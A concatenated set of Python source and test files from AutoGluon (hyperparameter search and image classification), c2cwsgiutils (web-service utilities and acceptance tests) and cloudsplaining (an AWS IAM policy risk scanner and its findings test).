the correct rung corresponding to the current iteration of the result.
"""
def __init__(self, min_t, max_t, reduction_factor, s):
self.rf = reduction_factor
MAX_RUNGS = int(np.log(max_t / min_t) / np.log(self.rf) - s + 1)
self._rungs = [(min_t * self.rf ** (k + s), dict())
for k in reversed(range(MAX_RUNGS))]
def cutoff(self, recorded):
if not recorded:
return None
return np.percentile(list(recorded.values()), (1 - 1 / self.rf) * 100)
def on_result(self, task, cur_iter, cur_rew):
"""
Decision on whether task may continue (action = True), or should be
stoppped (action = False).
milestone_reached is a flag whether cur_iter coincides with a milestone.
If True, next_milestone is the next milestone after cur_iter, or None
if there is none.
:param task: Only need task.task_id
:param cur_iter: Current time_attr value of task
:param cur_rew: Current reward_attr value of task
:return: action, milestone_reached, next_milestone
"""
assert cur_rew is not None, \
"Reward attribute must be a numerical value, not None"
action = True
milestone_reached = False
next_milestone = None
task_key = str(task.task_id)
for milestone, recorded in self._rungs:
if not (cur_iter < milestone or task_key in recorded):
# Note: It is important for model-based searchers that
# milestones are reached exactly, not jumped over. In
# particular, if a future milestone is reported via
# register_pending, its reward value has to be passed
# later on via update.
assert cur_iter == milestone, \
"cur_iter = {} > {} = milestone. Make sure to report time attributes covering all milestones".format(
cur_iter, milestone)
milestone_reached = True
cutoff = self.cutoff(recorded)
if cutoff is not None and cur_rew < cutoff:
action = False
recorded[task_key] = cur_rew
break
next_milestone = milestone
return action, milestone_reached, next_milestone
def get_first_milestone(self):
return self._rungs[-1][0]
def snapshot_rungs(self):
return [(x[0], copy.copy(x[1])) for x in self._rungs]
def __repr__(self):
iters = " | ".join([
"Iter {:.3f}: {}".format(milestone, self.cutoff(recorded))
for milestone, recorded in self._rungs
])
return "Bracket: " + iters
```
#### File: autogluon/searcher/grid_searcher.py
```python
__all__ = ['GridSearcher']
from .searcher import BaseSearcher
from sklearn.model_selection import ParameterGrid
class GridSearcher(BaseSearcher):
"""Grid Searcher that exhaustively tries all possible configurations.
This Searcher can only be used for discrete search spaces of type :class:`autogluon.space.Categorical`
Examples
--------
>>> import autogluon as ag
>>> @ag.args(
... x=ag.space.Categorical(0, 1, 2),
... y=ag.space.Categorical('a', 'b', 'c'))
>>> def train_fn(args, reporter):
... pass
>>> searcher = ag.searcher.GridSearcher(train_fn.cs)
>>> searcher.get_config()
Number of configurations for grid search is 9
{'x.choice': 2, 'y.choice': 2}
"""
def __init__(self, configspace, **kwargs):
super().__init__(
configspace, reward_attribute=kwargs.get('reward_attribute'))
param_grid = {}
hp_ordering = configspace.get_hyperparameter_names()
for hp in hp_ordering:
hp_obj = configspace.get_hyperparameter(hp)
hp_type = str(type(hp_obj)).lower()
assert 'categorical' in hp_type, \
'Only Categorical is supported, but {} is {}'.format(hp, hp_type)
param_grid[hp] = hp_obj.choices
self._configs = list(ParameterGrid(param_grid))
print('Number of configurations for grid search is {}'.format(len(self._configs)))
def __len__(self):
return len(self._configs)
def get_config(self):
""" Return new hyperparameter configuration to try next.
"""
return self._configs.pop()
```
#### File: task/image_classification/image_classification.py
```python
import logging
import os
import copy
import mxnet as mx
from .classifier import Classifier
from .dataset import get_dataset
from .nets import *
from .pipeline import train_image_classification
from .utils import *
from ..base import BaseTask, compile_scheduler_options, create_scheduler
from ...core import *
from ...core.loss import *
from ...core.optimizer import *
from ...scheduler.resource import get_cpu_count, get_gpu_count
from ...utils import update_params
__all__ = ['ImageClassification']
logger = logging.getLogger(__name__)
class ImageClassification(BaseTask):
"""AutoGluon Task for classifying images based on their content
"""
Classifier = Classifier
@staticmethod
def Dataset(path=None, name=None, train=True, input_size=224, crop_ratio=0.875, *args, **kwargs):
"""Dataset for AutoGluon image classification tasks.
May either be a :class:`autogluon.task.image_classification.ImageFolderDataset`, :class:`autogluon.task.image_classification.RecordDataset`,
or a popular dataset already built into AutoGluon ('mnist', 'fashionmnist', 'cifar10', 'cifar100', 'imagenet').
Parameters
----------
path : str, optional
The data location. If using :class:`ImageFolderDataset`,
image folder`path/to/the/folder` should be provided.
If using :class:`RecordDataset`, the `path/to/*.rec` should be provided.
name : str, optional
Which built-in dataset to use, will override all other options if specified.
The options are: 'mnist', 'fashionmnist', 'cifar', 'cifar10', 'cifar100', 'imagenet'
train : bool, optional, default = True
Whether this dataset should be used for training or validation.
input_size : int
The input image size.
crop_ratio : float
Center crop ratio (for evaluation only).
Returns
-------
Dataset object that can be passed to `task.fit()`, which is actually an :class:`autogluon.space.AutoGluonObject`.
To interact with such an object yourself, you must first call `Dataset.init()` to instantiate the object in Python.
"""
if name is None:
if path is None:
raise ValueError("Either `path` or `name` must be present in Dataset(). "
"If `name` is provided, it will override the rest of the arguments.")
return get_dataset(path=path, train=train, name=name,
input_size=input_size, crop_ratio=crop_ratio,
*args, **kwargs)
@staticmethod
def fit(dataset,
net=Categorical('ResNet50_v1b', 'ResNet18_v1b'),
optimizer=NAG(
learning_rate=Real(1e-3, 1e-2, log=True),
wd=Real(1e-4, 1e-3, log=True),
multi_precision=False
),
loss=SoftmaxCrossEntropyLoss(),
split_ratio=0.8,
batch_size=64,
input_size=224,
epochs=20,
final_fit_epochs=None,
ensemble=1,
metric='accuracy',
nthreads_per_trial=60,
ngpus_per_trial=1,
hybridize=True,
scheduler_options=None,
search_strategy='random',
search_options=None,
plot_results=False,
verbose=False,
time_limits=None,
resume=False,
output_directory='checkpoint/',
visualizer='none',
num_trials=2,
dist_ip_addrs=None,
auto_search=True,
lr_config=Dict(
lr_mode='cosine',
lr_decay=0.1,
lr_decay_period=0,
lr_decay_epoch='40,80',
warmup_lr=0.0,
warmup_epochs=0
),
tricks=Dict(
last_gamma=False,
use_pretrained=True,
use_se=False,
mixup=False,
mixup_alpha=0.2,
mixup_off_epoch=0,
label_smoothing=False,
no_wd=False,
teacher_name=None,
temperature=20.0,
hard_weight=0.5,
batch_norm=False,
use_gn=False),
**kwargs):
# TODO: ensemble and hybridize are not in docstring
"""
Fit image classification models to a given dataset.
Parameters
----------
dataset : str or :meth:`autogluon.task.ImageClassification.Dataset`
Training dataset containing images and their associated class labels.
Popular image datasets built into AutoGluon can be used by specifying their name as a string (options: ‘mnist’, ‘fashionmnist’, ‘cifar’, ‘cifar10’, ‘cifar100’, ‘imagenet’).
input_size : int
Size of images in the dataset (pixels).
net : str or :class:`autogluon.space.Categorical`
Which existing neural network models to consider as candidates.
optimizer : str or :class:`autogluon.space.AutoGluonObject`
Which optimizers to consider as candidates for learning the neural network weights.
batch_size : int
How many images to group in each mini-batch during gradient computations in training.
epochs: int
How many epochs to train the neural networks for at most.
final_fit_epochs: int, default None
Final fit epochs, the same number of epochs will be used as during the HPO if not specified.
metric : str or callable object
Evaluation metric by which predictions will be ulitmately evaluated on test data.
loss : `mxnet.gluon.loss`
Loss function used during training of the neural network weights.
num_trials : int
Maximal number of hyperparameter configurations to try out.
split_ratio : float, default = 0.8
Fraction of dataset to use for training (rest of data is held-out for tuning hyperparameters).
The final returned model may be fit to all of the data (after hyperparameters have been selected).
time_limits : int
Approximately how long `fit()` should run for (wallclock time in seconds).
`fit()` will stop training new models after this amount of time has elapsed (but models which have already started training will continue to completion).
nthreads_per_trial : int
How many CPUs to use in each trial (ie. single training run of a model).
ngpus_per_trial : int
How many GPUs to use in each trial (ie. single training run of a model).
output_directory : str
Checkpoints of the search state are written to
os.path.join(output_directory, 'exp1.ag')
scheduler_options : dict
Extra arguments passed to __init__ of scheduler, to configure the
orchestration of training jobs during hyperparameter-tuning.
search_strategy : str
Which hyperparameter search algorithm to use.
Options include: 'random' (random search), 'skopt' (SKopt Bayesian optimization), 'grid' (grid search), 'hyperband' (Hyperband), 'rl' (reinforcement learner)
search_options : dict
Auxiliary keyword arguments to pass to the searcher that performs hyperparameter optimization.
resume : bool
If True, the hyperparameter search is started from state loaded from
os.path.join(output_directory, 'exp1.ag')
dist_ip_addrs : list
List of IP addresses corresponding to remote workers, in order to leverage distributed computation.
verbose : bool
Whether or not to print out intermediate information during training.
plot_results : bool
Whether or not to generate plots summarizing training process.
visualizer : str
Describes method to visualize training progress during `fit()`. Options: ['mxboard', 'tensorboard', 'none'].
auto_search : bool
If True, enables automatic suggestion of network types and hyper-parameter ranges adaptively based on provided dataset.
Returns
-------
:class:`autogluon.task.image_classification.Classifier` object which can make predictions on new data and summarize what happened during `fit()`.
Examples
--------
>>> from autogluon import ImageClassification as task
>>> dataset = task.Dataset(train_path='data/train',
>>> test_path='data/test')
>>> classifier = task.fit(dataset,
>>> nets=ag.space.Categorical['resnet18_v1', 'resnet34_v1'],
>>> time_limits=time_limits,
>>> ngpus_per_trial=1,
>>> num_trials = 4)
>>> test_data = task.Dataset('~/data/test', train=False)
>>> test_acc = classifier.evaluate(test_data)
Bag of tricks are used on image classification dataset
lr_config
----------
lr-mode : type=str, default='step'.
describes how learning rate should be adjusted over the course of training. Options include: 'cosine', 'poly'.
lr-decay : type=float, default=0.1.
decay rate of learning rate. default is 0.1.
lr-decay-period : type=int, default=0.
interval for periodic learning rate decays. default is 0 to disable.
lr-decay-epoch : type=str, default='10,20,30'.
epochs at which learning rate decays. epochs=40, default is 10, 20, 30.
warmup-lr : type=float, default=0.0.
starting warmup learning rate. default is 0.0.
warmup-epochs : type=int, default=0.
number of warmup epochs.
tricks
----------
last-gamma', default= True.
whether to init gamma of the last BN layer in each bottleneck to 0.
use-pretrained', default= True.
enable using pretrained model from gluon.
use_se', default= False.
use SE layers or not in resnext. default is false.
mixup', default= False.
whether train the model with mix-up. default is false.
mixup-alpha', type=float, default=0.2.
beta distribution parameter for mixup sampling, default is 0.2.
mixup-off-epoch', type=int, default=0.
how many last epochs to train without mixup, default is 0.
label-smoothing', default= True.
use label smoothing or not in training. default is false.
no-wd', default= True.
whether to remove weight decay on bias, and beta/gamma for batchnorm layers.
teacher', type=str, default=None.
teacher model for distillation training
temperature', type=float, default=20.
temperature parameter for distillation teacher model
hard-weight', type=float, default=0.5.
weight for the loss of one-hot label for distillation training
batch-norm', default= True.
enable batch normalization or not in vgg. default is false.
use-gn', default= False.
whether to use group norm.
"""
checkpoint = os.path.join(output_directory, 'exp1.ag')
if auto_search:
# The strategies can be injected here, for example: automatic suggest some hps
# based on the dataset statistics
net = auto_suggest_network(dataset, net)
nthreads_per_trial = get_cpu_count() if nthreads_per_trial > get_cpu_count() else nthreads_per_trial
ngpus_per_trial = get_gpu_count() if ngpus_per_trial > get_gpu_count() else ngpus_per_trial
final_fit_epochs = final_fit_epochs if final_fit_epochs else epochs
train_image_classification.register_args(
dataset=dataset,
net=net,
optimizer=optimizer,
loss=loss,
metric=metric,
num_gpus=ngpus_per_trial,
split_ratio=split_ratio,
batch_size=batch_size,
input_size=input_size,
epochs=epochs,
final_fit_epochs=final_fit_epochs,
verbose=verbose,
num_workers=nthreads_per_trial,
hybridize=hybridize,
final_fit=False,
tricks=tricks,
lr_config=lr_config
)
# Backward compatibility:
grace_period = kwargs.get('grace_period')
if grace_period is not None:
if scheduler_options is None:
scheduler_options = {'grace_period': grace_period}
else:
assert 'grace_period' not in scheduler_options, \
"grace_period appears both in scheduler_options and as direct argument"
logger.warning(
"grace_period is deprecated, use "
"scheduler_options={'grace_period': ...} instead")
scheduler_options = copy.copy(scheduler_options)
scheduler_options['grace_period'] = grace_period
scheduler_options = compile_scheduler_options(
scheduler_options=scheduler_options,
search_strategy=search_strategy,
search_options=search_options,
nthreads_per_trial=nthreads_per_trial,
ngpus_per_trial=ngpus_per_trial,
checkpoint=checkpoint,
num_trials=num_trials,
time_out=time_limits,
resume=resume,
visualizer=visualizer,
time_attr='epoch',
reward_attr='classification_reward',
dist_ip_addrs=dist_ip_addrs,
epochs=epochs)
results = BaseTask.run_fit(
train_image_classification, search_strategy, scheduler_options,
plot_results=plot_results)
args = sample_config(train_image_classification.args, results['best_config'])
kwargs = {'num_classes': results['num_classes'], 'ctx': mx.cpu(0)}
model = get_network(args.net, **kwargs)
multi_precision = optimizer.kwvars['multi_precision'] if 'multi_precision' in optimizer.kwvars else False
update_params(model, results.pop('model_params'), multi_precision)
if ensemble > 1:
models = [model]
scheduler = create_scheduler(
train_image_classification, search_strategy, scheduler_options)
for i in range(1, ensemble):
resultsi = scheduler.run_with_config(results['best_config'])
kwargs = {
'num_classes': resultsi['num_classes'], 'ctx': mx.cpu(0)}
model = get_network(args.net, **kwargs)
update_params(
model, resultsi.pop('model_params'), multi_precision)
models.append(model)
model = Ensemble(models)
results.pop('args')
args.pop('optimizer')
args.pop('dataset')
args.pop('loss')
return Classifier(model, results, default_val_fn, checkpoint, args)
``` |
{
"source": "jhutchings1/c2cwsgiutils",
"score": 2
} |
#### File: tests/tests/test_broadcast.py
```python
def test_broadcast_reconfig(app_connection):
response = app_connection.get_json("broadcast", cors=False)
assert response == [42] # only one worker
```
#### File: tests/tests/test_debug.py
```python
import json
import time
def test_stacks(app_connection):
stacks = app_connection.get_json("c2c/debug/stacks", params={"secret": "changeme"}, cors=False)
_check_stacks(stacks)
def _check_stacks(stacks):
print("stacks=" + json.dumps(stacks, indent=4))
assert "c2cwsgiutils/debug" in json.dumps(stacks)
def test_header_auth(app_connection):
stacks = app_connection.get_json("c2c/debug/stacks", headers={"X-API-Key": "changeme"}, cors=False)
_check_stacks(stacks)
def test_no_auth(app_connection):
app_connection.get_json("c2c/debug/stacks", expected_status=403, cors=False)
def test_memory(app_connection):
memory = app_connection.get_json("c2c/debug/memory", params={"secret": "changeme"}, cors=False)
print("memory=" + json.dumps(memory, indent=4))
assert len(memory) == 1
def test_memory_analyze_functions(app_connection):
class_ = "builtins.function"
memory = app_connection.get_json(
"c2c/debug/memory", params={"secret": "changeme", "analyze_type": class_}, cors=False
)
print("memory=" + json.dumps(memory, indent=4))
assert len(memory) == 1
assert class_ in memory[0]
assert "modules" in memory[0][class_]
assert "timeout" not in memory[0][class_]
def test_memory_analyze_other(app_connection):
class_ = "gunicorn.six.MovedAttribute"
memory = app_connection.get_json(
"c2c/debug/memory", params={"secret": "changeme", "analyze_type": class_}, cors=False
)
print("memory=" + json.dumps(memory, indent=4))
assert len(memory) == 1
assert class_ in memory[0]
assert "biggest_objects" in memory[0][class_]
assert "timeout" not in memory[0][class_]
def test_sleep(app_connection):
start_time = time.monotonic()
app_connection.get(
"c2c/debug/sleep", params={"secret": "changeme", "time": "0.1"}, expected_status=204, cors=False
)
assert time.monotonic() - start_time > 0.1
def test_time(app_connection):
time_ = app_connection.get_json("c2c/debug/time", cors=False)
assert time_["timezone"] == "UTC" # run in docker -> UTC
def test_headers(app_connection):
response = app_connection.get_json(
"c2c/debug/headers", params={"secret": "changeme"}, headers={"X-Toto": "42"}, cors=False
)
print("response=" + json.dumps(response, indent=4))
assert response["headers"]["X-Toto"] == "42"
def _check_leak_there(response):
print("response=" + json.dumps(response, indent=4))
leaked = {v[0]: v[2] for v in response}
assert "c2cwsgiutils_app.services.LeakedObject" in leaked, leaked.keys()
assert leaked["c2cwsgiutils_app.services.LeakedObject"] == 1
def test_memory_diff(app_connection):
response = app_connection.get_json(
"c2c/debug/memory_diff", params={"secret": "changeme", "path": "/api/ping?toto=tutu"}, cors=False
)
_check_leak_there(response)
def test_memory_diff_deprecated(app_connection):
response = app_connection.get_json(
"c2c/debug/memory_diff/api/ping", params={"secret": "changeme"}, cors=False
)
_check_leak_there(response)
def test_error(app_connection):
app_connection.get_json(
"c2c/debug/error", params={"secret": "changeme", "status": "500"}, expected_status=500, cors=False
)
def test_memory_maps(app_connection):
memory = app_connection.get_json("c2c/debug/memory_maps", params={"secret": "changeme"}, cors=False)
print("memory_maps=" + json.dumps(memory, indent=4))
assert len(memory) > 0
def test_show_refs(app_connection):
refs = app_connection.get(
"c2c/debug/show_refs.dot",
params=dict(
secret="changeme",
analyze_type="gunicorn.app.wsgiapp.WSGIApplication",
max_depth="3",
too_many="10",
),
cors=False,
)
print("refs=" + refs)
assert "WSGIApplication" in refs
```
#### File: tests/tests/test_stats.py
```python
from c2cwsgiutils.acceptance import retry
@retry(Exception)
def test_ok(app_connection):
# reset the stats to be sure where we are at
app_connection.get_json("c2c/stats.json?reset=1", cors=False)
app_connection.get_json("hello") # to be sure we have some stats
stats = app_connection.get_json("c2c/stats.json", cors=False)
print(stats)
assert stats["timers"]["render/group=2/method=GET/route=hello/status=200"]["nb"] == 1
assert stats["timers"]["route/group=2/method=GET/route=hello/status=200"]["nb"] == 1
assert stats["timers"]["sql/read_hello"]["nb"] == 1
assert stats["timers"]["sql/query=SELECT FROM hello LIMIT ?"]["nb"] == 1
assert stats["gauges"]["test/gauge_s/toto=tutu/value=24"] == 42
assert stats["counters"]["test/counter"] == 1
def test_server_timing(app_connection):
r = app_connection.get_raw("hello")
assert "Server-Timing" in r.headers
def test_requests(app_connection):
# reset the stats to be sure where we are at
app_connection.get_json("c2c/stats.json?reset=1", cors=False)
app_connection.get_json("tracking/1")
stats = app_connection.get_json("c2c/stats.json", cors=False)
print(stats)
assert stats["timers"]["requests/host=localhost/method=GET/port=8080/scheme=http/status=200"]["nb"] == 1
def test_redis(app_connection):
# reset the stats to be sure where we are at
app_connection.get_json("c2c/stats.json?reset=1", cors=False)
# that sends a few PUBLISH to redis
app_connection.get_json("c2c/debug/stacks", params={"secret": "changeme"}, cors=False)
stats = app_connection.get_json("c2c/stats.json", cors=False)
print(stats)
assert stats["timers"]["redis/cmd=PUBLISH/success=1"]["nb"] >= 1
def test_version(app_connection):
app_connection.get_json("c2c/health_check", params={"checks": "version", "max_level": "10"}, cors=False)
version = app_connection.get_json("c2c/versions.json", cors=False)
stats = app_connection.get_json("c2c/stats.json", cors=False)
print(stats)
assert stats["counters"]["version/version=" + version["main"]["git_hash"]] == 1
```
#### File: c2cwsgiutils/acceptance/utils.py
```python
import logging
import os
import time
from typing import Callable, Any, Tuple, List
import boltons.iterutils
import netifaces
import requests
import pytest
LOG = logging.getLogger(__name__)
def in_docker() -> bool:
return os.environ.get("DOCKER_RUN", "0") == "1"
DOCKER_GATEWAY = netifaces.gateways()[netifaces.AF_INET][0][0] if in_docker() else "localhost"
DEFAULT_TIMEOUT = 60
def wait_url(url: str, timeout: float = DEFAULT_TIMEOUT) -> None:
def what() -> bool:
LOG.info("Trying to connect to %s... ", url)
r = requests.get(url, timeout=timeout)
if r.status_code == 200:
LOG.info("%s service started", url)
return True
else:
return False
retry_timeout(what, timeout=timeout)
def retry_timeout(what: Callable[[], Any], timeout: float = DEFAULT_TIMEOUT, interval: float = 0.5) -> Any:
timeout = time.monotonic() + timeout
while True:
error = ""
try:
ret = what()
if ret:
return ret
except NameError:
raise
except Exception as e: # pylint: disable=broad-except
error = str(e)
LOG.info(" Failed: %s", e)
if time.monotonic() > timeout:
assert False, "Timeout: " + error
time.sleep(interval)
skipIfCI = pytest.mark.skipif(os.environ.get("IN_CI", "0") == "1", reason="Not running on CI")
def approx(struct: Any, **kwargs: Any) -> Any:
"""
Make float values in deep structures approximative. See pytest.approx
"""
if isinstance(struct, float):
return pytest.approx(struct, **kwargs)
def visit(_path: List[str], key: Any, value: Any) -> Tuple[Any, Any]:
if isinstance(value, float):
value = pytest.approx(value, **kwargs)
return key, value
return boltons.iterutils.remap(struct, visit)
```
#### File: c2cwsgiutils/broadcast/interface.py
```python
from abc import abstractmethod
from typing import Optional, Callable, Mapping, Any, List
class BaseBroadcaster:
"""
Interface definition for message broadcasting implementation
"""
@abstractmethod
def subscribe(self, channel: str, callback: Callable[..., Any]) -> None:
pass # pragma: no cover
@abstractmethod
def unsubscribe(self, channel: str) -> None:
pass # pragma: no cover
@abstractmethod
def broadcast(
self, channel: str, params: Mapping[str, Any], expect_answers: bool, timeout: float
) -> Optional[List[Any]]:
pass # pragma: no cover
```
#### File: c2cwsgiutils/c2cwsgiutils/db_maintenance_view.py
```python
import logging
from typing import Mapping, Any, Optional, cast
import pyramid.request
from c2cwsgiutils import _utils, auth, broadcast, db
LOG = logging.getLogger(__name__)
CONFIG_KEY = "c2c.db_maintenance_view_enabled"
ENV_KEY = "C2C_DB_MAINTENANCE_VIEW_ENABLED"
REDIS_PREFIX = "c2c_db_maintenance_"
def install_subscriber(config: pyramid.config.Configurator) -> None:
"""
Install the view to configure the loggers, if configured to do so.
"""
if auth.is_enabled(config, ENV_KEY, CONFIG_KEY):
config.add_route(
"c2c_db_maintenance", _utils.get_base_path(config) + r"/db/maintenance", request_method="GET"
)
config.add_view(_db_maintenance, route_name="c2c_db_maintenance", renderer="fast_json", http_cache=0)
_restore(config)
LOG.info("Enabled the /db/maintenance API")
def _db_maintenance(request: pyramid.request.Request) -> Mapping[str, Any]:
auth.auth_view(request)
readonly_param = cast(str, request.params.get("readonly"))
if readonly_param is not None:
readonly = readonly_param.lower() == "true"
LOG.critical("Readonly DB status changed from %s to %s", db.force_readonly, readonly)
_set_readonly(value=readonly)
_store(request.registry.settings, readonly)
return {"status": 200, "readonly": readonly}
else:
readonly = _get_redis_value(request.registry.settings)
if readonly is not None:
readonly = readonly == "true"
return {"status": 200, "current_readonly": readonly}
@broadcast.decorator(expect_answers=True)
def _set_readonly(value: bool) -> bool:
db.force_readonly = value
return True
def _restore(config: pyramid.config.Configurator) -> None:
try:
readonly = _get_redis_value(config.get_settings())
if readonly is not None:
LOG.debug("Restoring readonly DB status to %s", readonly)
db.force_readonly = readonly == "true"
except ImportError:
pass # don't have redis
except Exception: # pylint: disable=broad-except
# survive an error since crashing now can have bad consequences for the service. :/
LOG.error("Cannot restore readonly DB status.", exc_info=True)
def _store(settings: Mapping[str, Any], readonly: bool) -> None:
try:
import redis
redis_url = _utils.env_or_settings(settings, broadcast.REDIS_ENV_KEY, broadcast.REDIS_CONFIG_KEY)
if redis_url:
con = redis.Redis.from_url(redis_url, socket_timeout=3, decode_responses=True)
con.set(REDIS_PREFIX + "force_readonly", "true" if readonly else "false")
except ImportError:
pass
def _get_redis_value(settings: Mapping[str, Any]) -> Optional[str]:
import redis
redis_url = _utils.env_or_settings(settings, broadcast.REDIS_ENV_KEY, broadcast.REDIS_CONFIG_KEY)
if redis_url is None:
return None
con = redis.Redis.from_url(redis_url, socket_timeout=3, decode_responses=True)
value = con.get(REDIS_PREFIX + "force_readonly")
return str(value) if value else None
```
#### File: c2cwsgiutils/stats_pyramid/_views.py
```python
from typing import cast
import pyramid.config
from c2cwsgiutils import _utils, stats
def init(config: pyramid.config.Configurator) -> None:
config.add_route(
"c2c_read_stats_json", _utils.get_base_path(config) + r"/stats.json", request_method="GET"
)
memory_backend = cast(stats.MemoryBackend, stats.BACKENDS["memory"])
config.add_view(
memory_backend.get_stats, route_name="c2c_read_stats_json", renderer="fast_json", http_cache=0
)
```
#### File: c2cwsgiutils/tests/test_loader.py
```python
from unittest.mock import patch, mock_open
from pyramid.scripts.common import get_config_loader
@patch(
"paste.deploy.loadwsgi.open",
mock_open(
read_data="""
[app:main]
variable = %(VARIABLE)s
"""
),
)
@patch.dict("c2cwsgiutils.loader.os.environ", {"VARIABLE": "value"})
def test_loader():
loader = get_config_loader("c2c:///app/production.ini")
assert 'c2cwsgiutils.loader.Loader(uri="c2c:///app/production.ini")' == repr(loader)
assert "value" == loader._get_defaults()["VARIABLE"] # pylint: disable=W0212
assert "value" == loader.get_settings("app:main")["variable"]
``` |
{
"source": "jhutchings1/cloudsplaining",
"score": 2
} |
#### File: cloudsplaining/scan/policy_detail.py
```python
from policy_sentry.util.arns import get_account_from_arn
from cloudsplaining.scan.policy_document import PolicyDocument
from cloudsplaining.shared.utils import get_full_policy_path
class PolicyDetails:
"""
Holds PolicyDetail objects. This is sourced from the 'Policies' section of the Authz file - whether they are AWS managed or customer managed.
"""
def __init__(self, policy_details):
self.policy_details = []
for policy_detail in policy_details:
self.policy_details.append(PolicyDetail(policy_detail))
# pylint: disable=too-many-instance-attributes
class PolicyDetail:
"""
Contains information about an IAM policy, including the policy document.
https://docs.aws.amazon.com/IAM/latest/APIReference/API_PolicyDetail.html
"""
def __init__(self, policy_detail):
# Store the Raw JSON data from this for safekeeping
self.policy_detail = policy_detail
# Store the attributes per Policy item
self.policy_name = policy_detail.get("PolicyName")
self.policy_id = policy_detail.get("PolicyId")
self.arn = policy_detail.get("Arn")
self.path = policy_detail.get("Path")
self.default_version_id = policy_detail.get("DefaultVersionId")
self.attachment_count = policy_detail.get("AttachmentCount")
self.permissions_boundary_usage_count = policy_detail.get(
"PermissionsBoundaryUsageCount"
)
self.is_attachable = policy_detail.get("IsAttachable")
self.create_date = policy_detail.get("CreateDate")
self.update_date = policy_detail.get("UpdateDate")
# Policy Documents are stored here. Multiple indices though. We will evaluate the one
# with IsDefaultVersion only.
self.policy_version_list = policy_detail.get("PolicyVersionList")
self.policy_document = self._policy_document()
def _policy_document(self):
"""Return the policy document object"""
policy_document = {}
for policy_version in self.policy_version_list:
if policy_version.get("IsDefaultVersion") is True:
policy_document = PolicyDocument(policy_version.get("Document"))
return policy_document
# This will help with the Exclusions mechanism. Get the full path of the policy, including the name.
@property
def full_policy_path(self):
"""Get the full policy path, including /aws-service-role/, if applicable"""
return get_full_policy_path(self.arn)
@property
def managed_by(self): # pragma: no cover
"""Determine whether the policy is AWS-Managed or Customer-managed based on a Policy ARN pattern."""
if "arn:aws:iam::aws:" in self.arn:
return "AWS"
else:
return "Customer"
@property
def account_id(self): # pragma: no cover
"""Return the account ID"""
if "arn:aws:iam::aws:" in self.arn:
return "N/A"
else:
account_id = get_account_from_arn(self.arn)
return account_id
```
#### File: test/output/test_findings.py
```python
import unittest
import json
from cloudsplaining.output.findings import (
UserFinding,
GroupFinding,
RoleFinding,
PolicyFinding,
Finding,
Findings
)
from cloudsplaining.scan.policy_document import PolicyDocument
from cloudsplaining.scan.assume_role_policy_document import AssumeRolePolicyDocument
from cloudsplaining.shared.exclusions import Exclusions
class TestFindings(unittest.TestCase):
def test_new_findings(self):
"""output.new_findings.Findings"""
self.maxDiff = None
test_policy = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject"
],
"Resource": "*"
}
]
}
policy_document = PolicyDocument(test_policy)
# (1) If the user is a member of an excluded group, return True
exclusions_cfg = dict(
users=["obama"],
groups=["exclude-group"],
roles=["MyRole"],
policies=["exclude-policy"]
)
exclusions = Exclusions(exclusions_cfg)
attached_managed_policies = [{
"PolicyArn": "arn:aws:iam::aws:policy/AWSLambdaFullAccess",
"PolicyName": "AWSLambdaFullAccess"
}]
# Let's just re-use the same policy for users groups and roles
user_finding = UserFinding(
policy_name="MyPolicy",
arn="arn:aws:iam::123456789012:user/SomeUser",
actions=["s3:GetObject"],
policy_document=policy_document,
group_membership=["admin"],
attached_managed_policies=attached_managed_policies,
exclusions=exclusions
)
group_finding = GroupFinding(
policy_name="MyPolicy",
arn="arn:aws:iam::123456789012:group/SomeGroup",
actions=["s3:GetObject"],
policy_document=policy_document,
members=["obama"],
exclusions=exclusions
)
trust_policy_from_compute_service_ecs_tasks = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"sts:AssumeRole"
],
"Principal": {
"Service": "ecs-tasks.amazonaws.com",
"AWS": "arn:aws:iam::012345678910:root",
}
}
]
}
assume_role_policy_document = AssumeRolePolicyDocument(trust_policy_from_compute_service_ecs_tasks)
role_finding = RoleFinding(
policy_name="MyPolicy",
arn="arn:aws:iam::123456789012:role/SomeRole",
actions=["s3:GetObject"],
policy_document=policy_document,
assume_role_policy_document=assume_role_policy_document,
exclusions=exclusions
)
policy_finding = PolicyFinding(
policy_name="AWSLambdaFullAccess",
arn="arn:aws:iam::aws:policy/AWSLambdaFullAccess",
actions=["s3:GetObject"],
policy_document=policy_document,
exclusions=exclusions
)
all_findings = Findings(exclusions)
all_findings.add_user_finding(user_finding)
result = all_findings.users[0]
expected_user_result = {
"AccountID": "123456789012",
"ManagedBy": "Customer",
"Name": "SomeUser",
"PolicyName": "MyPolicy",
"Type": "User",
"Arn": "arn:aws:iam::123456789012:user/SomeUser",
"AttachedToPrincipal": "SomeUser",
"ActionsCount": 1,
"ServicesCount": 1,
"Services": [
"s3"
],
"Actions": [
"s3:GetObject"
],
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject"
],
"Resource": "*"
}
]
},
"AssumeRolePolicyDocument": None,
"AssumableByComputeService": [],
"PrivilegeEscalation": [],
"DataExfiltrationActions": [
"s3:GetObject"
],
"PermissionsManagementActions": []
}
self.assertDictEqual(result.json, expected_user_result)
principal_policy_mapping = [
{
"Principal": "SomeUser",
"Type": "User",
"PolicyType": "Managed",
"ManagedBy": "AWS",
"PolicyName": "MyPolicy",
"GroupMembership": None,
},
{
"Principal": "SomeUser",
"Type": "User",
"PolicyType": "Managed",
"ManagedBy": "AWS",
"PolicyName": "AWSLambdaFullAccess",
"GroupMembership": None,
},
{
"Principal": "SomeGroup",
"Type": "Group",
"PolicyType": "Managed",
"ManagedBy": "AWS",
"PolicyName": "MyPolicy",
"GroupMembership": None,
},
{
"Principal": "SomeRole",
"Type": "Role",
"PolicyType": "Managed",
"ManagedBy": "AWS",
"PolicyName": "MyPolicy",
"GroupMembership": None,
},
]
all_findings.principal_policy_mapping = principal_policy_mapping
all_findings.add_group_finding(group_finding)
all_findings.add_role_finding(role_finding)
all_findings.add_policy_finding(policy_finding)
# print(len(all_findings))
self.assertEqual(len(all_findings), 4)
results = all_findings.json
expected_results = [
{
"AccountID": "N/A",
"ManagedBy": "AWS",
"Name": "AWSLambdaFullAccess",
"PolicyName": "AWSLambdaFullAccess",
"Type": "Policy",
"Arn": "arn:aws:iam::aws:policy/AWSLambdaFullAccess",
'AttachedToPrincipal': None,
"ActionsCount": 1,
"ServicesCount": 1,
"Services": [
"s3"
],
"Actions": [
"s3:GetObject"
],
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
